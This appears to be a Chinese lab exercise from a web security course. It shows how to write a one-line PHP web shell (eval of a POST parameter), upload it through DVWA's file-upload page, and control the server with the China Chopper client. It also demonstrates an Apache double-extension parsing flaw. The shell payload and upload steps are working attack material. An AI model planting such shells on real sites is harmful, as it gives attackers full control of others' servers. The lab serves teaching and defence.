Web安全与防护 实训指南 5.1利用中国菜刀连接WebShell.pdf

利用中国菜刀连接WebShell

【实训目的】

1.认识文件上传漏洞的危害；

2.能够熟练使用中国菜刀连接WebShell。

3.能够明白文件解析漏洞的危害。

【实训步骤】

步骤1、编写一句话木马

在桌面上新建文本文件ceshi.php，用记事本等文本编辑工具，将其内容修改

为：?php@eval($_POST[pass]);?，存盘退出即编写完成一句话木马。

步骤2、登录DVWA系统，选择文件上传页面

在DVWASecurity当中选择low选项，并提交。然后选择upload，出现如下

界面：

图5-4DWA文件上传漏洞界面

步骤3、上传木马文件

在上图所示的界面中，点击“浏览”按钮，选择新建的ceshi.php文件，点击

“upload”按钮，就完成了上传。同时，系统提示：../../hackable/uploads/ceshi.php

succesfullyuploaded!，这意味着文件是上传到了应用程序中的hackable/uplads目

录下。

图5-5DWA文件上传结果

步骤4、通过中国菜刀连接ceshi,php文件

（1）打开菜刀应用程序，在界面的空白占击中键，在菜单中选择添加。出

现如下添加SHELL界面：

图5-6中国菜刀连接一句话木马界面

在地址栏处填写详细的连接地址，保证能够访问到ceshi.php文件；在其右

侧栏中填写连接密码，实质就是木马$_POST数组的下标。选择完成脚本语言及

编码方式之后，点击右下角处“添加”按钮。就出现如下界面：

图5-7中国菜刀连接一句话木马连接

（2）双击该界面下的连接，就会连接到一句话木马ceshi.php。出现如下界

面：

图5-8中国菜刀连接一句话结果

此时，就如本地资源管理器一样管理服务器端的文件了。

步骤4、验证Apache文件解析漏洞。

将ceshi.php的名字修改为ceshi.php.owf.rar，然后按照步骤2、步骤3操作，

出现同样的结果，说明Apache文件解析的机制，导致其按照php文件进行解析。

【实训总结】

1.文件上传漏洞危害极大，可以利用一句话木马控制整个网站。

2.WEB容器文件解析漏洞可能会导致过滤措施失效，在进行文件过滤时需

要特别注意。